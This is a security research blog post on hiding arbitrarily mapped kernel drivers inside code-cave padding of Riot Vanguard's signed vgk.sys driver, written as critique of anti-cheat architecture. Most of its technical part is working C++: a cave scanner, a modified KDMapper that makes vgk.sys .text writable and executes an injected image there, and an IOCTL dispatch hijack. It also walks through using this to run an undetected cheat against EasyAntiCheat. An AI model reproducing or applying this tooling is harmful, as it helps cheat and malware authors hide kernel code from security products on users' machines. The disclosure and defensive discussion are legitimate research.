Leveraging Vanguard's Architecture

February 15, 2026
Tags: vanguard, kernel, persistence, vulnerability

Introduction

A few weeks ago I stumbled across something interesting while poking around Vanguard's driver architecture. Riot Games' anti-cheat contains a surprising amount of unused executable space that can be exploited for arbitrary code execution - way more than the typical 2 KB you'd find in most kernel drivers.

This article documents an interesting persistence primitive and discusses its architectural implications. It's not a deep technical analysis of Vanguard's internals - if you're looking for that level of detail, check out my EasyAntiCheat reversal work instead. This is more "here's something weird I found, here's proof it works, here's why it matters from a security architecture perspective."

Methodology & Scope

Before diving in, I want to be transparent about what this research actually covers versus what it doesn't.

What I Actually Did:
- PE structure analysis of vgk.sys using standard binary analysis tools
- Enumerated slack space across all sections with exact sizes and locations
- Built a modified KDMapper that allocates code inside vgk.sys .text section codecaves
- Tested execution from vgk.sys address space against EasyAntiCheat in live Fortnite sessions
- Verified the primitive persists as long as Valorant is never launched
- Used vgk's DriverObject structure for IOCTL hijacking

What I Didn't Do:
- Reverse engineer Vanguard's VM infrastructure or obfuscation mechanisms
- Analyze how their integrity checks work internally
- Investigate why these codecaves exist or what Vanguard might use them for
- Examine their infamous PatchGuard workaround or other mechanisms Vanguard employs

The technical findings about slack space locations and sizes are concrete and verifiable. The claims about how integrity checks work are based on observed behavior through testing - specifically that mapped code executes without detection until Valorant launches, at which point detection occurs. The architectural security implications are theory informed by general kernel security knowledge, not Vanguard-specific reversal.

Background on Vanguard

For those unfamiliar, Vanguard is Riot Games' kernel-mode anti-cheat system used primarily for Valorant. It runs as a boot-start driver with extensive virtualization and obfuscation throughout its codebase. Vanguard is known for its deep system integration, running continuously from boot regardless of whether Valorant is actually active.

Their architecture is genuinely innovative, specifically their use of kernel hooks like SwapContext, which gives them incredible visibility and power over the OS. However, this design choice is exactly what makes the primitive I'm discussing particularly interesting from a persistence perspective, because you're not just affecting people who are actively playing Valorant - you're affecting anyone who has it installed, period.

The Discovery: Slack Space Analysis

During basic reconnaissance of vgk.sys, I performed PE structure analysis to understand its binary layout. The results were immediately interesting and honestly kind of surprising.

Total Slack Space Breakdown:

Total slack space across all sections: ~221 KB

.nt section (RVA 0xb7000):
- Size: 16 KB
- Permissions: RW (not executable)
- Content: Entirely null bytes
- Purpose: Runtime storage

.text section (RX):
- Total slack space: ~127 KB
- Distribution: 366 separate regions
- Padding patterns: 0x00 or 0xCC bytes
- Largest contiguous region: ~13 KB

This is a massive amount compared to what you typically see in kernel drivers. For context, most drivers have maybe 2-4 KB of alignment padding at most. The predictable padding patterns (null bytes and int3 breakpoints) make these regions straightforward injection targets.
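The enumeration itself is just a run-length scan over each section's bytes. Below is a minimal, self-contained sketch of that counting logic, operating on a synthetic buffer rather than a real vgk.sys dump. The SlackStats struct and the 16-byte minimum-run threshold are my own choices here, picked to filter out ordinary instruction-alignment padding:

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Summary of padding runs (0x00 / 0xCC) inside a section image.
struct SlackStats {
    size_t total_bytes = 0;   // sum of all qualifying padding bytes
    size_t region_count = 0;  // number of runs >= min_run
    size_t largest_run = 0;   // largest contiguous run
};

// Scan a section for contiguous runs of padding bytes. Runs shorter
// than min_run are ignored: they are normal compiler alignment, not
// usable codecaves.
SlackStats ScanSlack(const uint8_t* data, size_t size, size_t min_run = 16) {
    SlackStats stats;
    size_t run = 0;
    for (size_t i = 0; i <= size; ++i) {
        // Treat i == size as a non-padding byte to flush the final run.
        bool pad = (i < size) && (data[i] == 0x00 || data[i] == 0xCC);
        if (pad) {
            ++run;
        } else {
            if (run >= min_run) {
                stats.total_bytes += run;
                ++stats.region_count;
                if (run > stats.largest_run) stats.largest_run = run;
            }
            run = 0;
        }
    }
    return stats;
}
```

Running this over each section of a dumped image gives the per-section totals, region counts, and largest-cave figures reported above.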

How the Primitive Works

Here's what I observed through testing: Vanguard runs 24/7 from boot, but its integrity checks appear to trigger only when you launch a Vanguard-protected game like Valorant.

This suggests Vanguard defers integrity validation until game launch, though without reversing their actual implementation I can't confirm the exact mechanism. What I can confirm is that in my testing, mapped code in vgk.sys slack space executed without detection for extended periods as long as Valorant never launched.

Implementation Details

The core modification to KDMapper involves replacing the standard pool allocation with codecave targeting in vgk.sys. Here's the actual implementation from my proof of concept:

Codecave Scanner:

ULONG64 FindCodeCave(ULONG64 module_base, const char* section_name, ULONG64 min_size) {
    BYTE header_buffer[0x1000];
    if (!intel_driver::ReadMemory(module_base, header_buffer, sizeof(header_buffer))) {
        return 0;
    }

    auto dos = (PIMAGE_DOS_HEADER)header_buffer;
    auto nt = (PIMAGE_NT_HEADERS64)(header_buffer + dos->e_lfanew);
    auto sections = IMAGE_FIRST_SECTION(nt);

    for (int i = 0; i < nt->FileHeader.NumberOfSections; i++) {
        // Section names are 8 bytes and not guaranteed null-terminated,
        // so bound the comparison instead of using strcmp.
        if (strncmp((char*)sections[i].Name, section_name, IMAGE_SIZEOF_SHORT_NAME) != 0)
            continue;

        ULONG64 section_start = module_base + sections[i].VirtualAddress;
        ULONG64 section_size = sections[i].Misc.VirtualSize;

        BYTE* section_data = new BYTE[section_size];
        if (!intel_driver::ReadMemory(section_start, section_data, section_size)) {
            delete[] section_data;
            return 0;
        }

        ULONG64 cave_start = 0, cave_len = 0;
        ULONG64 best_cave = 0, best_size = 0;

        for (ULONG64 j = 0; j < section_size; j++) {
            if (section_data[j] == 0x00 || section_data[j] == 0xCC) {
                if (cave_len == 0) cave_start = j;
                cave_len++;
            } else {
                if (cave_len > best_size) {
                    best_cave = cave_start;
                    best_size = cave_len;
                }
                cave_len = 0;
            }
        }

        if (cave_len > best_size) {
            best_cave = cave_start;
            best_size = cave_len;
        }

        delete[] section_data;

        if (best_size >= min_size) {
            return section_start + best_cave;
        }
        break;
    }

    return 0;
}

Modified MapDriver Function:

ULONG64 kdmapper::MapDriver(BYTE* data, ULONG64 param1, ULONG64 param2, 
                           bool free, bool destroyHeader, AllocationMode mode,
                           bool PassAllocationAddressAsFirstParam, 
                           mapCallback callback, NTSTATUS* exitCode) {
    
    const PIMAGE_NT_HEADERS64 nt_headers = portable_executable::GetNtHeaders(data);
    if (!nt_headers || nt_headers->OptionalHeader.Magic != IMAGE_NT_OPTIONAL_HDR64_MAGIC) {
        return 0;
    }

    ULONG32 actual_size = 0;
    const PIMAGE_SECTION_HEADER sections = IMAGE_FIRST_SECTION(nt_headers);
    for (int i = 0; i < nt_headers->FileHeader.NumberOfSections; i++) {
        ULONG32 section_end = sections[i].VirtualAddress + sections[i].SizeOfRawData;
        if (section_end > actual_size) {
            actual_size = section_end;
        }
    }

    ULONG32 image_size = (actual_size + 0x1FF) & ~0x1FF;

    ULONG64 target_base = utils::GetKernelModuleAddress("vgk.sys");
    if (!target_base) {
        return 0;
    }

    ULONG64 cave_base = FindCodeCave(target_base, ".text", image_size);
    if (!cave_base) {
        return 0;
    }

    BYTE header_buffer[0x1000];
    intel_driver::ReadMemory(target_base, header_buffer, sizeof(header_buffer));
    
    auto dos = (PIMAGE_DOS_HEADER)header_buffer;
    auto nt = (PIMAGE_NT_HEADERS64)(header_buffer + dos->e_lfanew);
    auto host_sections = IMAGE_FIRST_SECTION(nt);

    ULONG64 text_base = 0, text_size = 0;
    for (int i = 0; i < nt->FileHeader.NumberOfSections; i++) {
        if (strncmp((char*)host_sections[i].Name, ".text", IMAGE_SIZEOF_SHORT_NAME) == 0) {
            text_base = target_base + host_sections[i].VirtualAddress;
            text_size = host_sections[i].Misc.VirtualSize;
            break;
        }
    }

    void* local_image_base = VirtualAlloc(nullptr, image_size, 
                                          MEM_RESERVE | MEM_COMMIT, 
                                          PAGE_READWRITE);
    if (!local_image_base) {
        return 0;
    }

    memcpy(local_image_base, data, nt_headers->OptionalHeader.SizeOfHeaders);

    for (int i = 0; i < nt_headers->FileHeader.NumberOfSections; i++) {
        if (sections[i].Characteristics & IMAGE_SCN_CNT_UNINITIALIZED_DATA)
            continue;

        void* local_section = (void*)((ULONG64)local_image_base + sections[i].VirtualAddress);
        memcpy(local_section, (void*)((ULONG64)data + sections[i].PointerToRawData), 
               sections[i].SizeOfRawData);
    }

    RelocateImageByDelta(portable_executable::GetRelocs(local_image_base), 
                        cave_base - nt_headers->OptionalHeader.ImageBase);

    FixSecurityCookie(local_image_base, cave_base);
    ResolveImports(portable_executable::GetImports(local_image_base));

    intel_driver::MmSetPageProtection(text_base, text_size, PAGE_EXECUTE_READWRITE);
    intel_driver::WriteMemory(cave_base, local_image_base, image_size);

    const ULONG64 entry_point = cave_base + nt_headers->OptionalHeader.AddressOfEntryPoint;

    if (callback) {
        callback(&param1, &param2, cave_base, image_size);
    }

    NTSTATUS status = 0;
    intel_driver::CallKernelFunction(&status, entry_point,
                                    (PassAllocationAddressAsFirstParam ? cave_base : param1), 
                                    param2);

    if (exitCode) *exitCode = status;

    intel_driver::MmSetPageProtection(text_base, text_size, PAGE_EXECUTE_READ);

    VirtualFree(local_image_base, 0, MEM_RELEASE);
    return cave_base;
}

The key differences from standard KDMapper: Instead of AllocatePool(), we use FindCodeCave() to locate suitable space in vgk.sys .text. We temporarily flip vgk.sys .text to RWX, write our driver, then restore to RX. The driver remains in the codecave indefinitely - we don't free it since we didn't allocate it.

This works because vgk.sys .text contains enough padding for most drivers, and the padding patterns (0x00/0xCC) are predictable across versions.

A few constraints apply:
- Since the mapped image lives in .text (RX), you cannot rely on writable global variables - all mutable state must be stack-based or dynamically allocated elsewhere.
- The primitive requires writing to executable memory, which HVCI prevents. You'd need to disable HVCI, find an HVCI bypass or workaround, or restrict this to non-HVCI systems.
- The code must be mapped before Valorant launches - once Valorant starts, Vanguard's integrity checks will detect the modifications.
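The no-globals constraint shapes how the mapped driver has to be written. The usual pattern is to allocate one context structure at entry and thread it through every routine. A minimal user-mode sketch of that pattern, with calloc standing in for a nonpaged-pool allocation (the DriverContext fields are hypothetical):

```cpp
#include <cassert>
#include <cstdlib>

// All mutable state lives in one dynamically allocated context instead
// of globals. In a real driver the allocation would come from nonpaged
// pool (e.g. ExAllocatePool2), since the mapped image itself stays RX.
struct DriverContext {
    unsigned long ioctl_count;
    void* comm_buffer;
};

// Entry point allocates the context up front; every later routine
// receives it as a parameter rather than touching image-relative storage.
DriverContext* DriverInit() {
    return static_cast<DriverContext*>(std::calloc(1, sizeof(DriverContext)));
}

void OnIoctl(DriverContext* ctx) {
    ctx->ioctl_count++; // writable: heap memory, not the RX image
}
```

Any write that would have landed in .data of the mapped image instead goes through ctx, so nothing in the codecave ever needs to be writable after mapping.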

Why This Evades Anti-Cheats

EAC's typical execution detection vectors all fail against this primitive: unbacked-memory detection via NMIs or stack walking fails because the code is backed by vgk.sys. Comparing the in-memory image against the on-disk version might seem like the obvious countermeasure, but as explained below, Vanguard's obfuscation makes that impractical.

The Trust Amplification Angle

Since vgk.sys is a legitimately signed driver from Riot Games running as boot-start, it's inherently trusted by the operating system in ways that matter for evasion. Security products have extremely limited visibility into its behavior without potentially breaking legitimate functionality. Most AV/EDR vendors probably don't want to risk breaking Valorant for millions of users by being too aggressive with scanning Riot's driver.

Vanguard's deep system presence actually works in an attacker's favor here. Unusual kernel-level behavior originating from vgk.sys isn't particularly surprising to security products because Vanguard already performs highly privileged kernel operations normally. This means you can get away with things that would immediately trigger alerts if they came from even a less well-known signed driver. It's basically a post-compromise trust amplification vector where an attacker with any kernel write primitive can leverage Vanguard's legitimacy to evade detection across the entire security stack.

A kernel write primitive is obviously a prerequisite here - a vulnerable signed driver or any other method of writing to kernel memory. The technique is incompatible with HVCI (short of a bypass like ZeroHVCI) because page permissions must be flipped to perform the write, which is why the practical delivery route is a modified mapper like KDMapper. But once you have that primitive, using Vanguard as your execution host is far more effective than loading your own driver or allocating new memory regions that will immediately look suspicious.

Cross-Anticheat Evasion

Here's the interesting architectural paradox: This technique works incredibly well for games protected by anti-cheat systems other than Vanguard itself, like EasyAntiCheat or BattlEye. Vanguard's invasive kernel presence and signed status makes it the perfect evasion platform for attacking their competitors' security solutions. You're literally using Riot's anti-cheat to bypass other companies' anti-cheats.

Consider the scenario: a system has Vanguard installed for Valorant, so vgk.sys loads at boot. The user wants to cheat in Fortnite, which is protected by EasyAntiCheat, and never plays Valorant anymore. So:
- They map their cheat driver into a vgk.sys codecave.
- They launch Fortnite; EAC loads and scans the system.
- EAC sees vgk.sys popping up in stack walks and trusts it as a legitimate driver.
- The cheat executes from vgk.sys address space undetected.
- The user never launches Valorant, so Vanguard's integrity checks never run.

This works because EAC can't aggressively scan vgk.sys .text without risk - they have no way of knowing what these large codecaves are legitimately used for at runtime. vgk.sys is expected to perform privileged kernel operations, so the behavioral profile is indistinguishable from legitimate Vanguard activity, and there's no cross-vendor cooperation that would let EAC learn vgk's internal structure.

The Detection Problem

Detection from Vanguard's perspective is theoretically straightforward - they could hash their .text section and compare it periodically, or maintain a known-good copy for comparison. Whether they actually do this at game launch, I can't confirm without reversing their integrity check implementation. Based on Riot's response classifying this as not a security issue, they're likely either already detecting it at game launch and have determined it's outside their threat model since the user has already compromised their own kernel, or are aware but deferring implementation.
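Such a check is cheap to sketch. Assuming a known-good hash of .text captured at load time, the comparison looks roughly like this - the FNV-1a hash and the baseline/recheck split are illustrative choices of mine, not Vanguard's actual mechanism:

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// FNV-1a over a code section; any collision-resistant hash works in
// practice, this one just keeps the sketch dependency-free.
uint64_t HashSection(const uint8_t* data, size_t size) {
    uint64_t h = 1469598103934665603ull;
    for (size_t i = 0; i < size; ++i) {
        h ^= data[i];
        h *= 1099511628211ull;
    }
    return h;
}

// Baseline captured when the driver loads (or from a known-good copy).
struct IntegrityBaseline {
    uint64_t text_hash;
};

// Re-run periodically or at game launch: any write into section
// padding changes the hash and fails the comparison.
bool CheckIntegrity(const IntegrityBaseline& base,
                    const uint8_t* text, size_t text_size) {
    return HashSection(text, text_size) == base.text_hash;
}
```

The engineering cost isn't the check itself but deciding when to run it - which is exactly the boot-to-launch window this primitive lives in.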

From the perspective of a competing anti-cheat like EAC or BattlEye, this is where it gets way more complicated. They would need to implement checks that specifically target Vanguard's driver structure. They'd need to monitor every Vanguard release, extract and hash each version's .text section, maintain a massive version database, and update their own driver with new signatures constantly.

The obfuscation problem makes this even harder. Vanguard obfuscates everything, so a simple on-disk vs. in-memory comparison won't work - EAC cannot know whether a region full of null bytes is meant to stay null at runtime. Without deep Vanguard reversal, they have no way to distinguish legitimate Vanguard behavior from malicious modification.

Every Vanguard update breaks detection. A new .text layout means EAC's hash database is outdated, requiring emergency patches rolled out to millions of users - potentially weekly. And there are business and legal concerns: could Riot claim interference with their anti-tamper?

The reality is that implementing detection for this would be time-consuming (weeks or months of engineering), fragile (breaks on every Vanguard update), potentially controversial from business and legal perspectives, high maintenance (ongoing updates required), and low ROI since it affects only users with both Vanguard and the skill to exploit this.

It's a highly unconventional technique because it works not due to technical sophistication but because of the awkward position it puts competing products in.

Architectural Analysis

The persistence model here is genuinely interesting. You're running from a boot-start driver that's always present. Your code sits dormant in slack space until needed. You have IOCTL communication handed to you. As long as you never launch a Vanguard-protected game, their integrity checks never examine your modifications. It's perfect for long-term persistence against anti-cheats that focus on runtime detection of actively executing code.
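The "IOCTL communication handed to you" part refers to the DriverObject hijack mentioned in the methodology: overwriting the device-control dispatch slot in vgk's DRIVER_OBJECT so your mapped code receives IOCTLs addressed to Vanguard's device. Here's a sketch of the pointer swap using a mock user-mode structure in place of the real DRIVER_OBJECT (which has 28 MajorFunction slots indexed by IRP major code); in the real primitive the write goes through the kernel write primitive, and the saved original pointer would live in allocated context rather than a global:

```cpp
#include <cassert>

// Stand-ins for the kernel structures involved.
constexpr int IRP_MJ_DEVICE_CONTROL = 0x0E;
using DispatchFn = long (*)(void* device, void* irp);

struct MockDriverObject {
    DispatchFn MajorFunction[28]; // IRP_MJ_MAXIMUM_FUNCTION + 1
};

long OriginalDispatch(void*, void*) { return 0; }

// Saved original so unrecognized IOCTLs pass through untouched.
// (A global only for this user-mode mock - see the no-globals note.)
static DispatchFn g_original = nullptr;

long HookedDispatch(void* device, void* irp) {
    // A real hook would inspect the IRP's IoControlCode here, handle
    // its own private codes, and forward everything else.
    return g_original ? g_original(device, irp) : -1;
}

// The hijack itself: swap the device-control dispatch pointer in the
// host driver's DriverObject, keeping the original for pass-through.
void HijackIoctl(MockDriverObject* drv) {
    g_original = drv->MajorFunction[IRP_MJ_DEVICE_CONTROL];
    drv->MajorFunction[IRP_MJ_DEVICE_CONTROL] = HookedDispatch;
}
```

Because Vanguard's own dispatch still handles everything it recognizes, the hijack is invisible to legitimate callers while giving the mapped code a ready-made user-to-kernel channel.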

This primitive exists not because of a bug or oversight, but because of fundamental architectural decisions. Running from boot establishes a secure chain of trust before cheats can load, but creates an always-present attack surface even when the game isn't running. Only checking integrity at game launch reduces performance impact when game isn't active, but creates an exploitation window between boot and game launch. Using a boot-start driver that's always present can detect and prevent early-boot cheats, but attackers can leverage that presence for operations unrelated to your game.

None of these decisions are inherently wrong in isolation. Running from boot to establish a secure chain of trust is a massive leap forward in stopping traditional cheats. The problem is the combination creates this exploitable primitive.

Should anti-cheat software that protects a single game be running 24/7 in kernel mode on millions of machines? Consider:
- A user who plays Valorant 2 hours per day: vgk.sys protects Valorant for 2 hours, does nothing useful for 22 hours, but provides attack surface for 24 hours.
- A user who played Valorant once and uninstalled the game but not Vanguard: vgk.sys protects nothing while providing attack surface around the clock.
- An active Valorant player who also plays other games: vgk.sys protects Valorant for 2 hours, can potentially be weaponized against other games for 4 hours, sits idle for 18 hours, and provides attack surface for 24 hours.

Conclusion

I want to note that Vanguard's architecture is genuinely strong and innovative. Running from boot to establish a secure chain of trust is a massive leap forward in stopping traditional cheats before they load. Their technical implementation is impressive.

However, this article highlights the double-edged sword of that innovation: when you create a continuously running, highly trusted kernel module, you inadvertently create a prime host for advanced persistence.

This is just another example of how trust assumptions in kernel drivers can be abused when you think about the threat model holistically. The technique itself isn't revolutionary or particularly clever - finding codecaves in drivers is old news. What's interesting is the architectural decisions that make it possible, the industry dynamics that make detection unlikely, and the broader security implications: millions of users carry persistent kernel attack surface that can be abused by malware entirely unrelated to game cheating, including users who don't even play the game anymore.

"Protecting game integrity" and "protecting user security" are not the same goal and sometimes they're actively in tension with each other.

Riot's bug bounty program rightfully classifies this as not a Valorant security issue - from their threat model perspective, if an attacker has kernel write, the game is already compromised. But from a broader system security perspective, the fact that this primitive exists and affects millions of non-Valorant contexts matters.

As an industry, we need to start thinking more critically about the downstream security consequences of running invasive kernel-mode software 24/7, whether game anti-cheat really needs kernel persistence when the game isn't running, how we design trust boundaries in kernel drivers, and cross-vendor security cooperation versus competition.

Hopefully this case study contributes to that broader conversation. We can do better than this as an industry.

If you're a security researcher or anti-cheat developer interested in discussing these architectural concerns further, feel free to reach out. I'm always happy to talk about defensive techniques and better design patterns for kernel-mode security software.